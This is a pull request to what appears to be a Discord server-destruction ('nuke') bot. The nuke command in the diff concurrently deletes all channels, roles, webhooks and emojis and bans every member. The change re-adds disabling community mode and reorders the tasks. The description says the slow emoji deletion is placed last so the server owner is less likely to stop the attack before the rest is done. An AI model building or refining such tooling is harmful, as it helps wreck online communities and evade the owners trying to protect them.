### PR TITLE
Move delete all emojis to the last task in nuke command.

### DIFF
--- a/c-realV2.py
+++ b/c-realV2.py
@@ -1082,7 +1082,7 @@ async def disableCommunityMode(ctx):
             'preferred_locale': 'en-US', 
             'public_updates_channel_id': None, 'rules_channel_id': None})
 
-        consoleLog(f'Disabling cummunity mode response -> {r.text}', True)
+        consoleLog(f'Disabling community mode response -> {r.text}', True)
 
         await log(ctx, f'{Fore.GREEN}Disabled community mode.')
 
@@ -1427,7 +1427,7 @@ async def nuke(ctx):
         return
 
     await log(ctx, f'A nuke has been launched to `{selected_server.name}`.')
-    tasks = [deleteAllChannels(ctx), deleteAllRoles(ctx), banAll(ctx), deleteAllWebhooks(ctx), deleteAllEmojis(ctx)]
+    tasks = [disableCommunityMode(ctx), deleteAllChannels(ctx), deleteAllRoles(ctx), banAll(ctx), deleteAllWebhooks(ctx), deleteAllEmojis(ctx)]
     await asyncio.gather(*tasks)
 
     if len(settings['after']) > 0:

--- a/c-realV2.py
+++ b/c-realV2.py
@@ -1427,7 +1427,7 @@ async def nuke(ctx):
         return
 
     await log(ctx, f'A nuke has been launched to `{selected_server.name}`.')
-    tasks = [deleteAllChannels(ctx), deleteAllEmojis(ctx), deleteAllRoles(ctx), banAll(ctx), deleteAllWebhooks(ctx)]
+    tasks = [deleteAllChannels(ctx), deleteAllRoles(ctx), banAll(ctx), deleteAllWebhooks(ctx), deleteAllEmojis(ctx)]
     await asyncio.gather(*tasks)
 
     if len(settings['after']) > 0:


### PR DESCRIPTION
I have changed the delete all emojis task to be the last one in the nuke command, due to it possibly taking a long time to delete all of them, so while the emojis are getting deleted the owner has a chance of realizing and banning the account/bot doing the nuke.

also added back the disable community mode to the nuke command, for some reason it was removed from it.